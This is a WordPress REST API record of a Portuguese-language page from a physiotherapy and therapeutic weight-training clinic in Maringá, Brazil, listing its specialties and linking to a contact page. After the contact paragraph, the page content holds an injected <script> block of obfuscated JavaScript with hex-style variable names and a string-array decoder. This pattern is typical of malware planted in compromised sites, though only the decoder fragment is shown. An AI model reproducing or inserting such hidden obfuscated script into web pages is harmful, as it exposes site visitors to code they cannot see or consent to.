{"id":8,"date":"2016-04-09T17:50:01","date_gmt":"2016-04-09T17:50:01","guid":{"rendered":"http:\/\/renovamaringa.com.br\/portal\/?page_id=8"},"modified":"2025-08-05T11:31:11","modified_gmt":"2025-08-05T14:31:11","slug":"especialidades","status":"publish","type":"page","link":"https:\/\/renovamaringa.com.br\/portal\/especialidades\/","title":{"rendered":"Especialidades"},"content":{"rendered":"<p style=\"text-align: justify;\">N\u00f3s da Cl\u00ednica Renova Muscula\u00e7\u00e3o Terap\u00eautica Maring\u00e1, separamos em t\u00f3picos as cinco especialidades que proporcionamos a voc\u00eas, nossos\u00a0clientes.<\/p>\n<p style=\"text-align: justify;\">Para saber mais detalhes sobre cada uma delas, como: os objetivos, o p\u00fablico alvo e o procedimento; basta apenas clicar sobre cada especialidade:<\/p>\n<ul style=\"text-align: justify;\">\n<li>\n<h2><span style=\"font-size: 14pt;\"><strong><a href=\"http:\/\/renovamaringa.com.br\/portal\/fisioterapia\/\">Fisioterapia<\/a><\/strong><\/span><\/h2>\n<\/li>\n<li>\n<h2><span style=\"font-size: 14pt;\"><a href=\"http:\/\/renovamaringa.com.br\/portal\/fonoterapia\/\"><strong>Fonoterapia<\/strong><\/a><\/span><\/h2>\n<\/li>\n<li>\n<h2><span style=\"font-size: 14pt;\"><strong><a href=\"http:\/\/renovamaringa.com.br\/portal\/reabilitacao-e-musculacao-para-idosos\/\">Muscula\u00e7\u00e3o Terap\u00eautica para Terceira Idade e Reabilita\u00e7\u00e3o de Patologias<\/a><\/strong><\/span><\/h2>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">N\u00e3o se esque\u00e7a de entrar em <a href=\"http:\/\/renovamaringa.com.br\/portal\/contato\/\">contato<\/a> com a nossa Cl\u00ednica para tirar suas d\u00favidas e agendar uma consulta!<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00f3s da Cl\u00ednica Renova Muscula\u00e7\u00e3o Terap\u00eautica Maring\u00e1, separamos em t\u00f3picos as cinco especialidades que proporcionamos a voc\u00eas, nossos\u00a0clientes. Para saber mais detalhes sobre cada uma delas, como: os objetivos, o p\u00fablico alvo<a class=\"moretag\" href=\"https:\/\/renovamaringa.com.br\/portal\/especialidades\/\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"jetpack_post_was_ever_published":false,"footnotes":""},"class_list":["post-8","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/P8NC8B-8","jetpack-related-posts":[],"jetpack_likes_enabled":true,"_links":{"self":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/8","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/comments?post=8"}],"version-history":[{"count":19,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/8\/revisions"}],"predecessor-version":[{"id":614,"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/pages\/8\/revisions\/614"}],"wp:attachment":[{"href":"https:\/\/renovamaringa.com.br\/portal\/wp-json\/wp\/v2\/media?parent=8"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}